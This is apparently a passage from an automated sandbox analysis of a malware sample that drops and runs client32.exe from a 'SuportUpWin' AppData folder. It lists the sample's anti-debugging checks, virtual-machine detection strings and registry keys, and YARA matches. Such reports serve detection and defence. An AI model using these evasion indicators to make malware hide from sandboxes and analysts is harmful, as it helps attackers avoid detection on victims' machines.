                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF3F8B5
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,11_2_6CF3DA38
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_02291DE2 GetSystemInfo,VirtualQuery,VirtualAlloc,0_2_02291DE2
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: hkpqXovZtS.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: client32.exe, 00000003.00000003.1324848844.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1324539969.0000000005AFA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1324848844.0000000005AFA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3700828156.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005AFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: hkpqXovZtS.exeBinary or memory string: VMWARE
                                Source: hkpqXovZtS.exe, 00000000.00000003.1252376873.0000000000614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +aY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
                                Source: hkpqXovZtS.exeBinary or memory string: HARDWARE\ACPI\RSDT\VBOX__
                                Source: client32.exe, 0000000B.00000003.1371344457.0000000001457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: hkpqXovZtS.exeBinary or memory string: HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0IdentifierVMWAREIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0VMWAREHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0IdentifierVMWARESYSTEM\ControlSet001\Control\SystemInformationSystemManufacturerVMWARESYSTEM\ControlSet001\Control\SystemInformationSystemProductNameVMWAREIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0VBOXHARDWARE\Description\SystemSystemBiosVersionVBOXHARDWARE\Description\SystemVideoBiosVersionVIRTUALBOXHARDWARE\Description\SystemSystemBiosDate06/23/99IdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0QEMUHARDWARE\Description\SystemSystemBiosVersionQEMUSystem32\drivers\vmmouse.sysSystem32\drivers\vmhgfs.sysSystem32\drivers\vmmemctl.sysSystem32\drivers\vmrawdsk.sysSystem32\drivers\vmusbmouse.sysHARDWARE\ACPI\DSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\RSDT\VBOX__SOFTWARE\Oracle\VirtualBox Guest AdditionsSYSTEM\ControlSet001\Services\VBoxGuestSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\vioscsiSYSTEM\ControlSet001\Services\viostorSYSTEM\ControlSet001\Services\VirtIO-FS ServiceSYSTEM\ControlSet001\Services\VirtioSerialSYSTEM\ControlSet001\Services\BALLOONSYSTEM\ControlSet001\Services\BalloonServiceSYSTEM\ControlSet001\Services\netkvmSOFTWARE\Microsoft\Virtual Machine\Guest\ParametersSOFTWARE\VMware, Inc.\VMware ToolsSOFTWARE\WineSystem\CurrentControlSet\Services\Disk\EnumqemuvirtiovmwarevboxCount%dSystem\CurrentControlSet\Enum\IDESystem\CurrentControlSet\Enum\SCSIqemuvirtiovboxxenKVMKVMKVMTCGTCGTCGTCGVMwareVMwareXenVMMXenVMMprl hypervlrpepyh vrVBoxVBoxVBoxbhyve bhyveACRNACRNACRNQNXQVMBSQGVMwareVirtualBoxvboxVBOXVMWAREVirtualBoxvboxVBOXkernel32.dllEnumSystemFirmwareTablesGetSystemFirmwareTable
                                Source: hkpqXovZtS.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                                Source: hkpqXovZtS.exeBinary or memory string: System32\drivers\vmmouse.sys
                                Source: hkpqXovZtS.exeBinary or memory string: vmware
                                Source: hkpqXovZtS.exe, 00000000.00000003.1252376873.0000000000614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools]
                                Source: hkpqXovZtS.exeBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: hkpqXovZtS.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
                                Source: hkpqXovZtS.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxService
                                Source: hkpqXovZtS.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
                                Source: hkpqXovZtS.exeBinary or memory string: VMwareVMware
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: hkpqXovZtS.exeBinary or memory string: HARDWARE\ACPI\FADT\VBOX__
                                Source: hkpqXovZtS.exeBinary or memory string: System32\drivers\vmhgfs.sys
                                Source: hkpqXovZtS.exeBinary or memory string: System32\drivers\vmmemctl.sys
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end nodegraph_3-104498
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end nodegraph_3-104086
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end nodegraph_3-103985
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004D0F9C GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_004D0F9C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0045467A rdtsc 0_2_0045467A
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0046E874 IsDebuggerPresent,0_2_0046E874
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,3_2_110B7F30
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_02291C53 GetCurrentThread,GetCurrentThread,GetThreadPriority,GetCurrentThread,SetThreadPriority,GetCurrentProcessId,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,GetCurrentThread,CloseHandle,GetCurrentThread,SetThreadPriority,0_2_02291C53
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF66C74 VirtualProtect ?,-00000001,00000104,?3_2_6CF66C74
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040CA7B LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040CA7B
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0045A53D mov eax, dword ptr fs:[00000030h]0_2_0045A53D
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00460651 mov eax, dword ptr fs:[00000030h]0_2_00460651
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0045B9D5 mov eax, dword ptr fs:[00000030h]0_2_0045B9D5
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AAB51 mov eax, dword ptr fs:[00000030h]0_2_022AAB51
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AAB95 mov eax, dword ptr fs:[00000030h]0_2_022AAB95
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AABC6 mov eax, dword ptr fs:[00000030h]0_2_022AABC6
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022A5BE9 mov eax, dword ptr fs:[00000030h]0_2_022A5BE9
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,3_2_1117D104
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022A6F92 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022A6F92
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0229F2CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0229F2CC
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0229FC9C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0229FC9C
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,3_2_11031780
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,3_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF6ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6CF6ADFC
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6CEF0807
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF6C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6CF6C16F
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,11_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,11_2_11031780
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF6ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,11_2_6CF6ADFC
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_6CEF0807
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF6C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_6CF6C16F
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,3_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11113190 GetKeyState,DeviceIoControl,keybd_event,3_2_11113190
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,3_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,3_2_1109ED30
                                Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00410B05 cpuid 0_2_00410B05
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_11174898
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoA,3_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_11174796
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_11174A69
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6CEF888A
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6CEF8468
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6CEF65F0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6CEF85AC
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6CEF871C
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,11_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoA,11_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,11_2_11174796
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,11_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_11174898
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_11174A69
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,11_2_6CEF888A
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,11_2_6CEF8468
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,11_2_6CEF65F0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,11_2_6CEF85AC
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,11_2_6CEF871C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,3_2_110F37A0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0229F8E5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0229F8E5
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,3_2_11147160
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,3_2_11145C70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,3_2_11070430
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF62902 _errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_isleadbyte_l,RevokeBindStatusCallback,_errno,_errno,_invalid_parameter_noinfo,3_2_6CF62902
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_11070430
                                Source: Yara matchFile source: 3.0.client32.exe.650000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.client32.exe.650000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.650000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.70220000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.650000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.70230000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.70220000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.70230000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.6e8b0000.4.unpack, type: UNPACKEDPE
